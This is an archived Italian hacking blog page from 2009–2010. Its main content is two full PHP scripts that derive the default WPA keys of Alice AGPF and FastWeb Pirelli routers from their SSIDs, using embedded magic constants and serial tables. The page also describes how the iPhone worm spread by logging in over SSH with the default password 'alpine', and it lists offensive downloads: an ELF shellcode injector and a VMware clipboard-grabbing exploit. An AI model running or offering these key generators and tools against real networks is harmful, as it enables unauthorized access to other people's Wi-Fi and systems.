evilsocket.net » Exploiting

Script per il calcolo della chiave WPA dei router Alice Gate VoIP 2 Plus Wi-Fi

evilsocket — Sun, 06 Jun 2010 17:57:26 +0000

Come preannunciato nell’artcolo precedente sui router Fastweb, mi sono adoperato a studiare la brillante ricerca della WhiteHatCrew sui router di Alice, denominati AGPF, al fine di implementare uno script per la generazione della chiave WPA di default.

A differenza del caso FastWeb, il quale per il calcolo si basava solo sull SSID della rete, in questo caso ci serve anche il seriale del router che, come dimostrato dalla ricerca precedentemente linkata, è ricavabile tramite un sistema a due incognite dal quale, la WHC, ha tirato fuori una tabella di valori noti, tabella che ho inserito nel mio script.

Di conseguenza, a meno che il lettore non ampli la propria tabella a mano, seguendo le indicazioni della WHC, lo script funzionerà solo con SSID del tipo :

Alice-96xxxxxx
Alice-93xxxxxx
Alice-56xxxxxx
Alice-55xxxxxx
Alice-54xxxxxx
Alice-48xxxxxx
Alice-46xxxxxx

Sono sicuro cmq che cercando nella rete delle tabelle un po più estese si trovano

Lo script è commentato (come il precedente), in modo tale il lettore avrà la possibilità non solo di utilizzarlo, ma anche di capirlo, che è la cosa che più mi preme al fine di una condivisione libera dell’informazione e della cultura informatica in generale.

Enjoy.

/***************************************************************************
* Alice AGPF WPA Discovery *
* by evilsocket - evilsocket@gmail.com - http://www.evilsocket.net *
* based on *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* GNU General Public License for more details. *
* *
* You should have received a copy of the GNU General Public License *
* along with this program; if not, write to the *
* Free Software Foundation, Inc., *
* 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. *
***************************************************************************/

/*
* Tabella per il calcolo del seriale.
*
* First SSID digits => ( SN1, k, Q )
*/
$SN_TABLE = array( '96' => array( '69102', 13, 96017051 ),
'93' => array( '69101', 13, 92398366 ),
'56' => array( '67902', 13, 54808800 ),
'55' => array( '67904', 8, 55164449 ),
'54' => array( '67903', 8, 52420689 ),
'48' => array( '67903', 8, 47896103 ),
'46' => array( '67902', 13, 39015145 ) );
/*
* Numeri magici da utilizzare per il calcolo dell'SHA256.
*/
$ALIS = "\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8";
/*
* Tabella di conversione da hash a wpa.
*/
$CONV_TABLE = "0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuv".
"wxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123";
/*
* SSID della rete.
*/
$SSID = "Alice-96154825";
/*
* MAC address del router.
*/
$MAC    = "\x00\x23\x8E\x01\x02\x03";
/*
* Calcolo il seriale in base al SSID e alla tabella dei valori noti.
*/
$SN = SSID2SN($SSID);
/*
* Calcolo SHA256( MagicN + SN + MAC )
*/
$hash = SHA256( $ALIS.$SN.$MAC );
/*
* Converto la stringa dell'hash in un array di byte.
*/
$bytes    = hash2bytes($hash);
/*
* Trovo la WPA utilizzando i primi 24 byte dell'hash come indici della tabella di covnersione.
*/
$wpa = "";
for( $i = 0; $i < 24; $i++ ){
$wpa .= $CONV_TABLE[ $bytes[$i] ];
}

echo "WPA : $wpa\n";

/*
* Funzione per risalire al seriale del router partendo dal suo SSID e utilizzando
* le tabelle dei valori noti.
*/
function SSID2SN( $ssid ){
global $SN_TABLE;
/*
* Prelevo il numero intero dall'SSID e ne prendo le prime due cifre
* per verificare che il router sia presente nella tabella.
*/
preg_match_all( "/^Alice\-([0-9]+)/", $ssid, $m );
$ssidn = $m[1][0];
$id = substr( $ssidn, 0, 2 );

if( isset( $SN_TABLE[$id] ) ){
/*
* Ok, il router è presente nella tabella, prelevo la prima parte del seriale e
* le costanti k e Q da utilizzare nell'equazione finale.
*/
$sn1 = $SN_TABLE[$id][0];
$k = $SN_TABLE[$id][1];
$Q = $SN_TABLE[$id][2];
/*
* La seconda parte del seriale equivale a :
*    (SSID - Q) / k
*/
$sn2 = ((int)$ssidn - $Q) / $k;
/*
* Restituisco il seriale completo.
*/
return $sn1.'X'.sprintf( "%07s", $sn2 );
}
/*
* Router non presente nella tabella.
*/
else{
die( "La serie 'Alice-$id******' non è presente nella tabella e non è supportata.\n" );
}
}
/*
* Funzione per il calcolo di un hash SHA256.
*/
function SHA256( $phrase ){
return bin2hex( mhash( MHASH_SHA256, $phrase ) );
}
/*
* Funzione per convertire un hash in un array di byte interi.
*/
function hash2bytes( $hash ){
preg_match_all( "/[a-f0-9]{2}/i", $hash, $hash_bytes );
$bytes = array();
foreach( $hash_bytes[0] as $byte ){
$bytes[] = hexdec($byte);
}

return $bytes;
}

?>

Script per il calcolo della chiave WPA dei router FastWeb Pirelli.

evilsocket — Sat, 05 Jun 2010 05:18:13 +0000

Oggi mi sono inbattuto per caso in questo servizio, ovvero un servizio per “recuperare” la chiave WPA di un router Fastweb Pirelli.

“Bene” mi sono detto, “Se hanno questo servizio, avranno anche una pagina dove spiegano l’algoritmo e pubblicano il codice” .

Beh, la pagina c’era, e non era nemmeno un loro lavoro bensì quello di un altro gruppo (vedere il link “fonte” alla fine di quell’articolo), ma non c’era il sorgente!

In pratica, queste persone, hanno preso il lavoro che altri hanno pubblicato liberamente e per tutti, lo hanno ri-pubblicato (citando la fonte eh, per carità), ne hanno ricavato un servizio (guarda caso un servizio che fa gola a molti su un sito con degli ads pubblicitari) ma non hanno condiviso a loro volta le conoscenze distribuendo il codice del servizio … un po disonesto non vi pare?

Cioè, se io prendo un informazione libera, sono moralmente tenuto a rendere altrettanto libera qualsiasi opera io ne possa ricavare … non legalmente, ma moralmente.

Ebbene, ci penso io con un mio script fresco fresco

Vi posto qui di seguito il codice di uno script PHP che, seguendo quell’algoritmo, parte dal SSID di un router e stampa la chiave WPA di default.

Ribadisco, come loro, che :

Attualmente è possibile recuperare la chiave Wireless degli Access Point FastWeb Pirelli, nello specifico con i seguenti Mac Address:

00:08:27 Pirelli Broadband Solutions
00:13:C8 Pirelli Broadband Solutions
00:17:C2 Pirelli Broadband Solutions
00:19:3E Pirelli Broadband Solutions
00:1C:A2 Pirelli Broadband Solutions
00:1D:8B Pirelli Broadband Solutions
00:22:33 Pirelli Broadband Solutions
00:23:8E Pirelli Broadband Solutions
00:25:53 Pirelli Broadband Solutions
00:03:6F Telsey S.p.A. (in fase di Test)
00:21:96 Telsey S.p.A. (in fase di Test)

/***************************************************************************
* FastWeb Pirelli WPA Discovery *
* by evilsocket - evilsocket@gmail.com - http://www.evilsocket.net *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* GNU General Public License for more details. *
* *
* You should have received a copy of the GNU General Public License *
* along with this program; if not, write to the *
* Free Software Foundation, Inc., *
* 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. *
***************************************************************************/

/*
* SSID di partenza.
*/
$ssid = "FASTWEB-1-00193EA1B2C3";
/*
* 20 byte costanti cablati nel firmware dei Pirelli Fastweb.
*/
$seq_20 = "\x22\x33\x11\x34\x02\x81\xFA\x22\x11\x41\x68\x11\x12\x01\x05\x22\x71\x42\x10\x66";
/*
* Prelevo la parte finale del SSID.
*/
$sn = split( '-', $ssid );
$sn = $sn[2];
/*
* La divido in gruppi di due caratteri, formando un array
* di 6 rappresentazioni esadecimali di byte.
*/
preg_match_all( "/[a-f0-9]{2}/i", $sn, $sn_bytes );
$sn_bytes = $sn_bytes[0];
/*
* Inizializzo una stringa con il valore intero di questi byte.
*/
$str = "";
for( $i = 0; $i < 6; $i++ ){
$str .= chr( hexdec( $sn_bytes[$i] ) );
}
/*
* Aggiungo alla stringa i 20 byte "magici".
*/
$str .= $seq_20;
/*
* Ricavo i byte dell'hash md5 della stringa
*/
preg_match_all( "/[a-f0-9]{2}/i", md5($str), $md5_bytes );
$md5_bytes = $md5_bytes[0];
$long = "";
/*
* Converto i byte in sequenze binarie di 8 bit.
*/
foreach( $md5_bytes as $byte ){
$long .= sprintf( "%08s", decbin( hexdec($byte) ) );
}
/*
* Divido in 5 gruppi di 5 bit ognuno e, qual'ora il valore intero
* di un gruppo sia maggiore di 0x0a, aggiungo 0x57.
*/
$hex_5 = array();
for( $i = 0; $i < 25; $i += 5 ){
$n = bindec( substr( $long, $i, 5 ) );
$hex_5[] = $n > 0x0a ? $n + 0x57 : $n;
}
/*
* Compongo la chiave.
*/
$wpa = "";
foreach( $hex_5 as $hex ){
$wpa .= sprintf( "%02x", $hex );
}

print "WPA : $wpa\n";

?>

Detto questo, a breve pubblicherò uno script analogo ma per i router Alice, dato che stanno uscendo lavori anche in questo senso

Il Worm dell’iPhone … il Jailbreak è rischioso?

evilsocket — Mon, 21 Dec 2009 17:13:36 +0000

Un po di tempo fa ha fatto scalpore il primo virus di tipo worm per iPhone, che nel giro di pochi giorni aveva ownato una miriade di melafonini in giro per il mondo.

Dopo l’accaduto, subito nella rete si sono sparsi svariati rumors, la maggior parte dei quali si può riassumere in :

Non eseguite il jailbreak dell’iPhone se non volete essere infettati!

Dato che sta frase è evidentemente stupida e, in alcuni casi, aimè è stata pronunciata con secondi fini (della serie “ecco una scusa x far credere a tutti che jailbreakare non va bene”), tanto xkè non c’ho niente da fare scrivo un po nel dettaglio cosa faceva sto worm, come funzionava ma soprattutto PERCHE’ funzionava.

Innanzitutto, c’è da fare un preambolo.

Nel momento in cui si jailbreaka il proprio iPhone, viene installato il demone ssh configurato con la password di root di default “alpine” (e qui i più svegli hanno già capito l’inghippo).

Naturalmente è scontato che tale password va contestualmente cambiata con una più sicura e meno conosciuta, ma a quanto pare tanto scontato non è dato che gli iPhone ownati erano proprio di persone che non hanno eseguito questo procedimento.

In pratica, il worm in questione, eseguiva una scansione sui seguenti indirizzi:

192.168.0.0-192.168.3.255	Local network
94.157.100.0-94.157.255.255	T-mobile, Netherlands
87.103.52.255-87.103.66.255	Vodafone, Portugal
94.157.0.0.0-120.157.99.255	T-mobile, Netherlands
114.72.0.0-114.75.255.255	OPTUSINTERNET, Australia
92.248.90.0-92.248.120.255	MOBILKOM, Austria
81.217.74.0-81.217.74.255	Kabelsignal AG, Austria
84.224.60.0-84.224.80.255	Pannon GSM Telecommunications Inc, Hungary
188.88.100.0-188.88.160.255	T-Mobile, Netherlands
77.248.140.0-77.248.146.255	UPC Broadband, Austria
77.54.160.0-77.54.190.255	Vodafone, Portugal
80.57.116.0-80.57.131.255	UPC Broadband Austria
84.224.0.0-84.224.63.255	Pannon GSM Telecommunications Inc, Hungary

(tabella prelevata da questo sito)

Come è facile intuire, sono gli intervalli di indirizzi ip che identificano i maggiori provider di connettività mobile.

Una volta identificato un host attivo tra quelli nell’intervallo, il worm sostanzialmente verificava se la porta 22 era aperta (quella del demone ssh) e provava a loggarsi con la password di default alpine.

Una volta dentro, copiava se stesso sul dispositivo e continuava la scansione sulla subnet locale del telefono infettato, e così via, ripdoducendosi esponenzialmente.

That’s fucking all!

Non è stata colpa del jailbreak, non è stata colpa di un mistico exploit 0day che sfruttava qualche strana falla nel sistema … è stata colpa solo ed esclusivamente, come nel 99% dei casi, della stupidità umana.

Cazzo ma non ti viene in mente di cambiarla la password ssh quando lo installi ?!?!? Bah -.-

Resettare le password ed i privilegi di MySQL

Alice Router Unlocker

evilsocket — Mon, 18 May 2009 01:52:13 +0000

Basandomi sul lavoro di saxdax e drpepperONE che potete trovare su milw0rm ho buttato giÃ¹ al volo questo piccolo script che automatizza tutta la procedura descritta nel paper, procedurÃ che sbloccherÃ il vostro router di alice mettendo a disposizione taaante interessanti features che mamma telecom voleva tenerci nascoste .

Scarica

VMWare Hacking

evilsocket — Wed, 13 May 2009 07:43:22 +0000

Un video nel quale mostro la fattibilitÃ di un attacco ad un sistema vmware sfruttando il tool che si trova nell’apposita sezione .

Scarica

StackHack

evilsocket — Wed, 13 May 2009 07:39:29 +0000

Lo stack, questo sconosciuto !

In questo paper illustro alcuni aspetti basilari dello stack e altri non molto noti, o quantomeno non molto considerati che presentano riscontri pratici decisamente interessanti .

Scarica

ELF32 Injector

evilsocket — Wed, 13 May 2009 06:53:32 +0000

Applicazione che ho scritto insieme a BlackLight che, dato un comando bash arbitrario, manipola la struttura elf di un eseguibile *nix inserendo uno shellcode che forkerÃ in parallelo il codice originale dell’eseguibile e il comando da noi iniettato .

Scarica

Shellcode Generator

VMWare Clipboard Grabber PoC

evilsocket — Wed, 13 May 2009 06:50:54 +0000

Piccola utility/exploit che mostra come sia possibile, dall’interno di un sistema virtualizzato da vmware, “grabbare” i dati della clipboard (per intenderci ciÃ² che si copia-e-incolla) del sistema fisico che ospita l’immagine virtuale .

Scarica